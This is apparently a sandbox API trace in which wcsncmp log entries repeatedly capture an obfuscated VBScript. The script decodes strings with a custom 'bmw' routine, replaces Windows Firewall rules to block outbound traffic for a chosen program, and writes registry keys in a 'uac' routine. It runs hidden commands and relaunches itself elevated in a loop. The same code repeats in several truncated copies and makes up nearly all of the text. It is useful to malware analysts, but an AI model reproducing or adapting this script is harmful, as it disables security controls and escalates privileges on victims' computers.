= 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0222.946] wcsncmp (_String1="(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0222.946] wcsncmp (_String1="s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.946] wcsncmp (_String1="1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0222.946] wcsncmp (_String1=") > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 